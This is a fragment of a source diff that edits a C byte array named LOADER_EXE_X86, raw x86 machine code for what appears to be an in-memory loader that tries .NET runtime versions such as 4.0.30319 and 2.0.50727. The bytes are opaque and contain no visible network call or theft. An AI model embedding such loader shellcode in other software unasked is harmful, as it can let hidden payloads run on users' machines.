0x00, 0x89, 0x44, 0x24, 0x48, 0x8d, 0x84, 0x24, 0xf4, 0x00, 0x00, 0x00,
@ -188,9 +188,9 @@ unsigned char LOADER_EXE_X86[] = {
0x89, 0x44, 0x24, 0x18, 0x83, 0x7c, 0x24, 0x10, 0x00, 0x74, 0x4e, 0x6a,
0x04, 0x68, 0x00, 0x30, 0x00, 0x00, 0xff, 0x74, 0x24, 0x18, 0x6a, 0x00,
0xff, 0x56, 0x3c, 0x89, 0x86, 0x60, 0x0d, 0x00, 0x00, 0x85, 0xc0, 0x74,
0x13, 0xff, 0x74, 0x24, 0x10, 0x53, 0x50, 0xe8, 0x17, 0x24, 0x00, 0x00,
0x13, 0xff, 0x74, 0x24, 0x10, 0x53, 0x50, 0xe8, 0x6b, 0x24, 0x00, 0x00,
0x33, 0xed, 0x83, 0xc4, 0x0c, 0x45, 0xeb, 0x02, 0x33, 0xed, 0xff, 0x74,
0x24, 0x10, 0x6a, 0x00, 0x53, 0xe8, 0x25, 0x24, 0x00, 0x00, 0x8b, 0x44,
0x24, 0x10, 0x6a, 0x00, 0x53, 0xe8, 0x79, 0x24, 0x00, 0x00, 0x8b, 0x44,
0x24, 0x24, 0x83, 0xc4, 0x0c, 0x53, 0x6a, 0x01, 0xff, 0x10, 0x50, 0xff,
0x96, 0x88, 0x00, 0x00, 0x00, 0x57, 0xff, 0x96, 0xd0, 0x00, 0x00, 0x00,
0xff, 0x74, 0x24, 0x30, 0xff, 0x96, 0xd0, 0x00, 0x00, 0x00, 0xff, 0x74,
@ -198,8 +198,8 @@ unsigned char LOADER_EXE_X86[] = {
0x83, 0xbe, 0x34, 0x02, 0x00, 0x00, 0x03, 0x75, 0x45, 0xff, 0xb6, 0x58,
0x0d, 0x00, 0x00, 0x8b, 0xbe, 0x60, 0x0d, 0x00, 0x00, 0x8d, 0x86, 0x48,
0x0d, 0x00, 0x00, 0x57, 0x50, 0x8d, 0x86, 0x38, 0x0d, 0x00, 0x00, 0x50,
0xe8, 0x9e, 0x20, 0x00, 0x00, 0xff, 0x76, 0x2c, 0x8d, 0x86, 0x2c, 0x0c,
0x00, 0x00, 0xff, 0x76, 0x28, 0x50, 0xe8, 0x62, 0x1f, 0x00, 0x00, 0x83,
0xe8, 0xf2, 0x20, 0x00, 0x00, 0xff, 0x76, 0x2c, 0x8d, 0x86, 0x2c, 0x0c,
0x00, 0x00, 0xff, 0x76, 0x28, 0x50, 0xe8, 0xb6, 0x1f, 0x00, 0x00, 0x83,
0xc4, 0x1c, 0x3b, 0x87, 0x18, 0x05, 0x00, 0x00, 0x75, 0x0c, 0x3b, 0x97,
0x1c, 0x05, 0x00, 0x00, 0x75, 0x04, 0x8b, 0xc5, 0xeb, 0x02, 0x33, 0xc0,
0x5f, 0x5e, 0x5d, 0x5b, 0x81, 0xc4, 0xec, 0x02, 0x00, 0x00, 0xc3, 0x81,
@ -216,11 +216,11 @@ unsigned char LOADER_EXE_X86[] = {
0x8b, 0xb4, 0x24, 0xf4, 0x01, 0x00, 0x00, 0x8b, 0x54, 0x24, 0x10, 0xff,
0xb4, 0x24, 0x04, 0x02, 0x00, 0x00, 0x8d, 0x84, 0x24, 0xec, 0x00, 0x00,
0x00, 0xc6, 0x84, 0x14, 0xec, 0x00, 0x00, 0x00, 0x00, 0xff, 0xb4, 0x24,
0x04, 0x02, 0x00, 0x00, 0x50, 0xe8, 0x97, 0x1e, 0x00, 0x00, 0x89, 0x44,
0x04, 0x02, 0x00, 0x00, 0x50, 0xe8, 0xeb, 0x1e, 0x00, 0x00, 0x89, 0x44,
0x24, 0x24, 0x83, 0xc4, 0x0c, 0x8b, 0x44, 0x24, 0x14, 0x83, 0xc0, 0xfc,
0x89, 0x54, 0x24, 0x1c, 0x8d, 0x04, 0x98, 0x89, 0x44, 0x24, 0x10, 0xff,
0xb4, 0x24, 0x04, 0x02, 0x00, 0x00, 0x8b, 0x08, 0xff, 0xb4, 0x24, 0x04,
0x02, 0x00, 0x00, 0x03, 0xce, 0x51, 0xe8, 0x66, 0x1e, 0x00, 0x00, 0x33,
0x02, 0x00, 0x00, 0x03, 0xce, 0x51, 0xe8, 0xba, 0x1e, 0x00, 0x00, 0x33,
0x44, 0x24, 0x24, 0x83, 0xc4, 0x0c, 0x33, 0x54, 0x24, 0x1c, 0x3b, 0x84,
0x24, 0xf8, 0x01, 0x00, 0x00, 0x75, 0x09, 0x3b, 0x94, 0x24, 0xfc, 0x01,
0x00, 0x00, 0x74, 0x1d, 0x8b, 0x44, 0x24, 0x10, 0x83, 0xe8, 0x04, 0x89,
@ -242,9 +242,9 @@ unsigned char LOADER_EXE_X86[] = {
0x56, 0x57, 0x8b, 0x40, 0x30, 0x8b, 0x7d, 0x08, 0x8b, 0x40, 0x0c, 0x8b,
0x70, 0x0c, 0x39, 0x4e, 0x18, 0x74, 0x2a, 0x8b, 0x5d, 0x0c, 0x85, 0xc9,
0x75, 0x3f, 0x39, 0x5e, 0x18, 0x74, 0x12, 0x51, 0xff, 0x75, 0x14, 0xff,
0x76, 0x18, 0x57, 0xe8, 0xc3, 0x1b, 0x00, 0x00, 0x83, 0xc4, 0x10, 0x8b,
0x76, 0x18, 0x57, 0xe8, 0x17, 0x1c, 0x00, 0x00, 0x83, 0xc4, 0x10, 0x8b,
0xc8, 0x8b, 0x36, 0x83, 0x7e, 0x18, 0x00, 0x75, 0xdd, 0x85, 0xc9, 0x75,
0x1c, 0xff, 0x75, 0x10, 0x57, 0xe8, 0x0b, 0x1b, 0x00, 0x00, 0x59, 0x59,
0x1c, 0xff, 0x75, 0x10, 0x57, 0xe8, 0x5f, 0x1b, 0x00, 0x00, 0x59, 0x59,
0x85, 0xc0, 0x74, 0x0b, 0xff, 0x75, 0x14, 0x50, 0xff, 0x57, 0x34, 0x8b,
0xc8, 0xeb, 0x02, 0x33, 0xc9, 0x5f, 0x5e, 0x8b, 0xc1, 0x5b, 0x5d, 0xc3,
0x56, 0x8b, 0x74, 0x24, 0x0c, 0x57, 0x33, 0xff, 0x8b, 0x4e, 0x18, 0x85,
@ -275,57 +275,57 @@ unsigned char LOADER_EXE_X86[] = {
0x45, 0x08, 0xff, 0x75, 0x24, 0xff, 0x75, 0x20, 0x8b, 0x48, 0x08, 0xff,
0x75, 0x1c, 0xff, 0x75, 0x18, 0x8b, 0x11, 0xff, 0x75, 0x0c, 0x50, 0x51,
0xff, 0x52, 0x2c, 0x5d, 0xc2, 0x24, 0x00, 0x55, 0x8b, 0xec, 0x81, 0xec,
0x04, 0x02, 0x00, 0x00, 0x53, 0x56, 0x57, 0xe8, 0x8b, 0x19, 0x00, 0x00,
0x8b, 0x75, 0x0c, 0xb9, 0x7a, 0x1f, 0x40, 0x00, 0xbf, 0x7b, 0x36, 0x40,
0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x01, 0xe8, 0x71, 0x19,
0x04, 0x02, 0x00, 0x00, 0x53, 0x56, 0x57, 0xe8, 0xdf, 0x19, 0x00, 0x00,
0x8b, 0x75, 0x0c, 0xb9, 0x7a, 0x1f, 0x40, 0x00, 0xbf, 0xcf, 0x36, 0x40,
0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x01, 0xe8, 0xc5, 0x19,
0x00, 0x00, 0xb9, 0x32, 0x1c, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b,
0x0e, 0x89, 0x41, 0x04, 0xe8, 0x5e, 0x19, 0x00, 0x00, 0xb9, 0x03, 0x20,
0x0e, 0x89, 0x41, 0x04, 0xe8, 0xb2, 0x19, 0x00, 0x00, 0xb9, 0x03, 0x20,
0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x08, 0xe8,
0x4b, 0x19, 0x00, 0x00, 0xb9, 0x9f, 0x1c, 0x40, 0x00, 0x2b, 0xcf, 0x03,
0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x0c, 0xe8, 0x38, 0x19, 0x00, 0x00, 0xb9,
0x9f, 0x19, 0x00, 0x00, 0xb9, 0x9f, 0x1c, 0x40, 0x00, 0x2b, 0xcf, 0x03,
0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x0c, 0xe8, 0x8c, 0x19, 0x00, 0x00, 0xb9,
0x75, 0x1c, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41,
0x10, 0xe8, 0x25, 0x19, 0x00, 0x00, 0xb9, 0x51, 0x1c, 0x40, 0x00, 0x2b,
0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x14, 0xe8, 0x12, 0x19, 0x00,
0x10, 0xe8, 0x79, 0x19, 0x00, 0x00, 0xb9, 0x51, 0x1c, 0x40, 0x00, 0x2b,
0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x14, 0xe8, 0x66, 0x19, 0x00,
0x00, 0xb9, 0xb9, 0x1c, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e,
0x89, 0x41, 0x18, 0xe8, 0xff, 0x18, 0x00, 0x00, 0xb9, 0x1c, 0x12, 0x40,
0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x1c, 0xe8, 0xec,
0x18, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1,
0x8b, 0x0e, 0x89, 0x41, 0x20, 0xe8, 0xd9, 0x18, 0x00, 0x00, 0xb9, 0x2e,
0x89, 0x41, 0x18, 0xe8, 0x53, 0x19, 0x00, 0x00, 0xb9, 0x1c, 0x12, 0x40,
0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x1c, 0xe8, 0x40,
0x19, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1,
0x8b, 0x0e, 0x89, 0x41, 0x20, 0xe8, 0x2d, 0x19, 0x00, 0x00, 0xb9, 0x2e,
0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x24,
0xe8, 0xc6, 0x18, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf,
0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x28, 0xe8, 0xb3, 0x18, 0x00, 0x00,
0xe8, 0x1a, 0x19, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf,
0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x28, 0xe8, 0x07, 0x19, 0x00, 0x00,
0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89,
0x41, 0x2c, 0xe8, 0xa0, 0x18, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00,
0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x30, 0xe8, 0x8d, 0x18,
0x41, 0x2c, 0xe8, 0xf4, 0x18, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00,
0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x30, 0xe8, 0xe1, 0x18,
0x00, 0x00, 0xb9, 0xeb, 0x1f, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b,
0x0e, 0x89, 0x41, 0x34, 0xe8, 0x7a, 0x18, 0x00, 0x00, 0xb9, 0x2e, 0x11,
0x0e, 0x89, 0x41, 0x34, 0xe8, 0xce, 0x18, 0x00, 0x00, 0xb9, 0x2e, 0x11,
0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x38, 0xe8,
0x67, 0x18, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03,
0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x3c, 0xe8, 0x54, 0x18, 0x00, 0x00, 0xb9,
0xbb, 0x18, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03,
0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x3c, 0xe8, 0xa8, 0x18, 0x00, 0x00, 0xb9,
0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41,
0x40, 0xe8, 0x41, 0x18, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b,
0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x44, 0xe8, 0x2e, 0x18, 0x00,
0x40, 0xe8, 0x95, 0x18, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b,
0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x44, 0xe8, 0x82, 0x18, 0x00,
0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e,
0x89, 0x41, 0x48, 0xe8, 0x1b, 0x18, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40,
0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x4c, 0xe8, 0x08,
0x89, 0x41, 0x48, 0xe8, 0x6f, 0x18, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40,
0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x4c, 0xe8, 0x5c,
0x18, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1,
0x8b, 0x0e, 0x89, 0x41, 0x50, 0xe8, 0xf5, 0x17, 0x00, 0x00, 0xb9, 0x49,
0x8b, 0x0e, 0x89, 0x41, 0x50, 0xe8, 0x49, 0x18, 0x00, 0x00, 0xb9, 0x49,
0x1c, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x54,
0xe8, 0xe2, 0x17, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf,
0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x58, 0xe8, 0xcf, 0x17, 0x00, 0x00,
0xe8, 0x36, 0x18, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf,
0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x58, 0xe8, 0x23, 0x18, 0x00, 0x00,
0xb9, 0x6d, 0x1c, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89,
0x41, 0x5c, 0xe8, 0xbc, 0x17, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00,
0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x60, 0xe8, 0xa9, 0x17,
0x41, 0x5c, 0xe8, 0x10, 0x18, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00,
0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x60, 0xe8, 0xfd, 0x17,
0x00, 0x00, 0xb9, 0x13, 0x20, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b,
0x0e, 0x89, 0x41, 0x64, 0xe8, 0x96, 0x17, 0x00, 0x00, 0xb9, 0x41, 0x1c,
0x0e, 0x89, 0x41, 0x64, 0xe8, 0xea, 0x17, 0x00, 0x00, 0xb9, 0x41, 0x1c,
0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x68, 0xe8,
0x83, 0x17, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03,
0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x6c, 0xe8, 0x70, 0x17, 0x00, 0x00, 0xb9,
0xd7, 0x17, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03,
0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x6c, 0xe8, 0xc4, 0x17, 0x00, 0x00, 0xb9,
0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41,
0x70, 0xe8, 0x5d, 0x17, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b,
0x70, 0xe8, 0xb1, 0x17, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b,
0xcf, 0x8b, 0x7d, 0x08, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x74, 0x8d,
0x85, 0xfc, 0xfd, 0xff, 0xff, 0x83, 0x66, 0x10, 0x00, 0x50, 0x8d, 0x87,
0x19, 0x06, 0x00, 0x00, 0x89, 0x7e, 0x14, 0x50, 0x57, 0xe8, 0x16, 0x17,
0x19, 0x06, 0x00, 0x00, 0x89, 0x7e, 0x14, 0x50, 0x57, 0xe8, 0x6a, 0x17,
0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x5e, 0x04, 0x8d, 0x85, 0xfc, 0xfd,
0xff, 0xff, 0x53, 0x50, 0xff, 0x97, 0xb8, 0x00, 0x00, 0x00, 0x85, 0xc0,
0x75, 0x13, 0x8b, 0x0b, 0x8d, 0x46, 0x08, 0x50, 0x8d, 0x87, 0xc0, 0x08,
@ -351,7 +351,7 @@ unsigned char LOADER_EXE_X86[] = {
0x00, 0x00, 0x00, 0x7d, 0x0b, 0x88, 0x0c, 0x17, 0x40, 0x42, 0x8a, 0x0a,
0x84, 0xc9, 0x75, 0xe9, 0x85, 0xc0, 0x74, 0x1d, 0xff, 0x75, 0x0c, 0x46,
0xc6, 0x44, 0x05, 0x80, 0x00, 0x03, 0xf0, 0x8d, 0x45, 0x80, 0x50, 0xe8,
0xb4, 0x1c, 0x00, 0x00, 0x59, 0x59, 0x85, 0xc0, 0x75, 0xbc, 0x40, 0xeb,
0x08, 0x1d, 0x00, 0x00, 0x59, 0x59, 0x85, 0xc0, 0x75, 0xbc, 0x40, 0xeb,
0x02, 0x33, 0xc0, 0x5f, 0x5e, 0xc9, 0xc3, 0x55, 0x8b, 0xec, 0x83, 0xec,
0x1c, 0x83, 0x7d, 0x0c, 0x00, 0x74, 0x31, 0x6a, 0x1c, 0x8d, 0x45, 0xe4,
0x50, 0x8b, 0x45, 0x08, 0xff, 0x75, 0x0c, 0xff, 0x50, 0x44, 0x83, 0xf8,
@ -359,48 +359,55 @@ unsigned char LOADER_EXE_X86[] = {
0x81, 0x7d, 0xfc, 0x00, 0x00, 0x02, 0x00, 0x75, 0x0b, 0x83, 0x7d, 0xf8,
0x04, 0x75, 0x05, 0x33, 0xc0, 0x40, 0xc9, 0xc3, 0x33, 0xc0, 0xc9, 0xc3,
0x81, 0xec, 0x14, 0x02, 0x00, 0x00, 0x53, 0x8b, 0x9c, 0x24, 0x24, 0x02,
0x00, 0x00, 0x33, 0xc0, 0x21, 0x44, 0x24, 0x04, 0x55, 0x8b, 0xac, 0x24,
0x24, 0x02, 0x00, 0x00, 0x56, 0x57, 0x8b, 0xbc, 0x24, 0x28, 0x02, 0x00,
0x00, 0x8b, 0x8f, 0xe8, 0x00, 0x00, 0x00, 0x85, 0xc9, 0x0f, 0x84, 0x82,
0x00, 0x00, 0x00, 0x53, 0x8d, 0x87, 0x60, 0x08, 0x00, 0x00, 0x50, 0x8d,
0x87, 0x50, 0x08, 0x00, 0x00, 0x50, 0xff, 0xd1, 0x85, 0xc0, 0x0f, 0x88,
0x9d, 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x24, 0x50, 0x8d, 0x45, 0x0c,
0x50, 0x57, 0xe8, 0x3d, 0x15, 0x00, 0x00, 0x8b, 0x13, 0x8d, 0x73, 0x04,
0x83, 0xc4, 0x0c, 0x8d, 0x87, 0x70, 0x08, 0x00, 0x00, 0x8b, 0x0a, 0x56,
0x50, 0x8d, 0x44, 0x24, 0x2c, 0x50, 0x52, 0xff, 0x51, 0x0c, 0x85, 0xc0,
0x78, 0x34, 0x8b, 0x06, 0x8d, 0x54, 0x24, 0x14, 0x52, 0x50, 0x8b, 0x08,
0xff, 0x51, 0x28, 0x85, 0xc0, 0x78, 0x33, 0x83, 0x7c, 0x24, 0x14, 0x00,
0x74, 0x1f, 0x8b, 0x0e, 0x8d, 0x43, 0x08, 0x50, 0x8d, 0x87, 0x90, 0x08,
0x00, 0x00, 0x50, 0x8b, 0x11, 0x8d, 0x87, 0x80, 0x08, 0x00, 0x00, 0x50,
0x51, 0xff, 0x52, 0x24, 0xeb, 0x03, 0x83, 0x26, 0x00, 0x85, 0xc0, 0x78,
0x09, 0x83, 0xbf, 0xe8, 0x00, 0x00, 0x00, 0x00, 0x75, 0x1c, 0x8d, 0x43,
0x00, 0x00, 0x33, 0xc0, 0x55, 0x8b, 0xac, 0x24, 0x24, 0x02, 0x00, 0x00,
0x56, 0x57, 0x8b, 0xbc, 0x24, 0x28, 0x02, 0x00, 0x00, 0x33, 0xf6, 0x89,
0x74, 0x24, 0x18, 0x8b, 0x8f, 0xe8, 0x00, 0x00, 0x00, 0x85, 0xc9, 0x0f,
0x84, 0xd5, 0x00, 0x00, 0x00, 0x53, 0x8d, 0x87, 0x60, 0x08, 0x00, 0x00,
0x50, 0x8d, 0x87, 0x50, 0x08, 0x00, 0x00, 0x50, 0xff, 0xd1, 0x85, 0xc0,
0x0f, 0x88, 0xee, 0x00, 0x00, 0x00, 0x8d, 0x4c, 0x24, 0x24, 0xc6, 0x45,
0x0d, 0x34, 0x51, 0x8d, 0x45, 0x0c, 0xc6, 0x45, 0x11, 0x33, 0x50, 0x57,
0x66, 0xc7, 0x45, 0x13, 0x33, 0x31, 0xc6, 0x45, 0x15, 0x39, 0xe8, 0x7d,
0x15, 0x00, 0x00, 0x8b, 0x0b, 0x8d, 0x53, 0x04, 0x83, 0xc4, 0x0c, 0x8b,
0x01, 0x52, 0x8d, 0x97, 0x70, 0x08, 0x00, 0x00, 0x52, 0x8d, 0x54, 0x24,
0x2c, 0x52, 0x51, 0xff, 0x50, 0x0c, 0x85, 0xc0, 0x79, 0x40, 0x8d, 0x44,
0x24, 0x24, 0xc6, 0x45, 0x0d, 0x32, 0x50, 0x8d, 0x45, 0x0c, 0xc6, 0x45,
0x11, 0x35, 0x50, 0x57, 0x66, 0xc7, 0x45, 0x13, 0x37, 0x32, 0xc6, 0x45,
0x15, 0x37, 0xe8, 0x3d, 0x15, 0x00, 0x00, 0x8b, 0x03, 0x8d, 0x53, 0x04,
0x83, 0xc4, 0x0c, 0x8b, 0x08, 0x52, 0x8d, 0x97, 0x70, 0x08, 0x00, 0x00,
0x52, 0x8d, 0x54, 0x24, 0x2c, 0x52, 0x50, 0xff, 0x51, 0x0c, 0x85, 0xc0,
0x78, 0x35, 0x8b, 0x43, 0x04, 0x8d, 0x54, 0x24, 0x14, 0x52, 0x50, 0x8b,
0x08, 0xff, 0x51, 0x28, 0x85, 0xc0, 0x78, 0x32, 0x39, 0x74, 0x24, 0x14,
0x74, 0x20, 0x8b, 0x4b, 0x04, 0x8d, 0x43, 0x08, 0x50, 0x8d, 0x87, 0x90,
0x08, 0x00, 0x00, 0x50, 0x8b, 0x11, 0x8d, 0x87, 0x80, 0x08, 0x00, 0x00,
0x50, 0x51, 0xff, 0x52, 0x24, 0xeb, 0x03, 0x21, 0x73, 0x04, 0x85, 0xc0,
0x78, 0x08, 0x39, 0xb7, 0xe8, 0x00, 0x00, 0x00, 0x75, 0x1c, 0x8d, 0x43,
0x08, 0x50, 0x8d, 0x87, 0x90, 0x08, 0x00, 0x00, 0x50, 0x8d, 0x87, 0x80,
0x08, 0x00, 0x00, 0x50, 0x6a, 0x00, 0x6a, 0x00, 0xff, 0x97, 0xe4, 0x00,
0x00, 0x00, 0x85, 0xc0, 0x79, 0x10, 0x83, 0x63, 0x08, 0x00, 0x33, 0xc0,
0xe9, 0x1b, 0x01, 0x00, 0x00, 0x83, 0x23, 0x00, 0xeb, 0xd0, 0x8b, 0x43,
0x08, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x28, 0x85, 0xc0, 0x0f, 0x88, 0x01,
0x01, 0x00, 0x00, 0x8d, 0x85, 0x0c, 0x01, 0x00, 0x00, 0x80, 0x38, 0x00,
0x8d, 0x73, 0x0c, 0x75, 0x0c, 0x8b, 0x43, 0x08, 0x56, 0x50, 0x8b, 0x08,
0xff, 0x51, 0x34, 0xeb, 0x3e, 0x8d, 0x4c, 0x24, 0x24, 0x51, 0x50, 0x57,
0xe8, 0x73, 0x14, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x24,
0x50, 0xff, 0x97, 0xb0, 0x00, 0x00, 0x00, 0x8b, 0x4b, 0x08, 0x8b, 0xf0,
0x8d, 0x43, 0x0c, 0x50, 0x6a, 0x00, 0x8b, 0x11, 0x56, 0x51, 0xff, 0x52,
0x30, 0x56, 0x89, 0x44, 0x24, 0x1c, 0xff, 0x97, 0xb4, 0x00, 0x00, 0x00,
0x8b, 0x44, 0x24, 0x18, 0x8d, 0x73, 0x0c, 0x85, 0xc0, 0x0f, 0x88, 0xa1,
0x00, 0x00, 0x00, 0x8b, 0x16, 0x8d, 0x43, 0x10, 0x50, 0x8d, 0x87, 0xa0,
0x00, 0x00, 0x85, 0xc0, 0x79, 0x0e, 0x21, 0x73, 0x08, 0x33, 0xc0, 0xe9,
0x1c, 0x01, 0x00, 0x00, 0x21, 0x33, 0xeb, 0xd2, 0x8b, 0x43, 0x08, 0x50,
0x8b, 0x08, 0xff, 0x51, 0x28, 0x85, 0xc0, 0x0f, 0x88, 0x05, 0x01, 0x00,
0x00, 0x8d, 0x85, 0x0c, 0x01, 0x00, 0x00, 0x80, 0x38, 0x00, 0x8d, 0x53,
0x0c, 0x75, 0x0c, 0x8b, 0x43, 0x08, 0x52, 0x50, 0x8b, 0x08, 0xff, 0x51,
0x34, 0xeb, 0x3f, 0x8d, 0x4c, 0x24, 0x24, 0x51, 0x50, 0x57, 0xe8, 0x75,
0x14, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x24, 0x50, 0xff,
0x97, 0xb0, 0x00, 0x00, 0x00, 0x8b, 0x4b, 0x08, 0x8b, 0xf0, 0x8d, 0x43,
0x0c, 0x50, 0x6a, 0x00, 0x8b, 0x11, 0x56, 0x51, 0xff, 0x52, 0x30, 0x56,
0x89, 0x44, 0x24, 0x14, 0xff, 0x97, 0xb4, 0x00, 0x00, 0x00, 0x8b, 0x74,
0x24, 0x18, 0x8b, 0x44, 0x24, 0x10, 0x85, 0xc0, 0x0f, 0x88, 0xa4, 0x00,
0x00, 0x00, 0x8b, 0x53, 0x0c, 0x8d, 0x43, 0x10, 0x50, 0x8d, 0x87, 0xa0,
0x08, 0x00, 0x00, 0x50, 0x8b, 0x0a, 0x52, 0xff, 0x11, 0x85, 0xc0, 0x0f,
0x88, 0x87, 0x00, 0x00, 0x00, 0x8b, 0x85, 0x24, 0x05, 0x00, 0x00, 0x83,
0x88, 0x89, 0x00, 0x00, 0x00, 0x8b, 0x85, 0x24, 0x05, 0x00, 0x00, 0x83,
0x64, 0x24, 0x20, 0x00, 0x89, 0x44, 0x24, 0x1c, 0x8d, 0x44, 0x24, 0x1c,
0x50, 0x6a, 0x01, 0x6a, 0x11, 0xff, 0x97, 0x98, 0x00, 0x00, 0x00, 0x8b,
0xf0, 0x85, 0xf6, 0x74, 0x63, 0x8b, 0x56, 0x0c, 0x33, 0xc9, 0x39, 0x8d,
0x24, 0x05, 0x00, 0x00, 0x76, 0x13, 0x8a, 0x84, 0x29, 0x28, 0x05, 0x00,
0x00, 0x88, 0x04, 0x0a, 0x41, 0x3b, 0x8d, 0x24, 0x05, 0x00, 0x00, 0x72,
0xed, 0x8b, 0x4b, 0x10, 0x8d, 0x43, 0x14, 0x50, 0x56, 0x51, 0x8b, 0x11,
0xff, 0x92, 0xb4, 0x00, 0x00, 0x00, 0xf7, 0xd8, 0x1b, 0xc0, 0x33, 0xd2,
0x40, 0x8b, 0xca, 0x89, 0x44, 0x24, 0x10, 0x8b, 0x46, 0x0c, 0x39, 0x95,
0x24, 0x05, 0x00, 0x00, 0x76, 0x13, 0x88, 0x94, 0x29, 0x28, 0x05, 0x00,
0x00, 0x88, 0x14, 0x08, 0x41, 0x3b, 0x8d, 0x24, 0x05, 0x00, 0x00, 0x72,
0xed, 0x56, 0xff, 0x97, 0xa4, 0x00, 0x00, 0x00, 0x8b, 0x44, 0x24, 0x10,
0x50, 0x6a, 0x01, 0x6a, 0x11, 0xff, 0x97, 0x98, 0x00, 0x00, 0x00, 0x89,
0x44, 0x24, 0x10, 0x85, 0xc0, 0x74, 0x63, 0x8b, 0x50, 0x0c, 0x33, 0xc9,
0x39, 0x8d, 0x24, 0x05, 0x00, 0x00, 0x76, 0x13, 0x8a, 0x84, 0x29, 0x28,
0x05, 0x00, 0x00, 0x88, 0x04, 0x0a, 0x41, 0x3b, 0x8d, 0x24, 0x05, 0x00,
0x00, 0x72, 0xed, 0x8b, 0x4b, 0x10, 0x8d, 0x43, 0x14, 0x8b, 0x5c, 0x24,
